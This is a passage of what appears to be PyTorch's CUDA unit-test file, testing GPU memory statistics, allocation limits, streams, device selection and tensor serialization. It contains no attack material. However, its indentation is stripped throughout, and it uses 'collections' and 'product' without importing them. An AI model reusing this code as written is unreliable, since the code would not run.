import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we did, the TEST_CUDNN line from torch.testing._internal.common_cuda would be executed
# multiple times during the execution of this test suite, which can cause a CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
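# Helper: builds an (uncoalesced) sparse tensor of sparse type `t` with `n`
# randomly placed values over the given dense `sizes`.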
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
            # emptying cache may happen (due to allocation or empty_cache), so
            # we can't assert new_r >= last_r
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
        # Testing the behaviour with no argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
        # Testing the behaviour with no argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
        # advance a generator with an end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
        # test that a 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
        # it will OOM when trying to allocate more than half the memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
            # Pushes a 0.1 second spin to the stream so that, if the copy is
            # non-blocking, the stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self):
orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
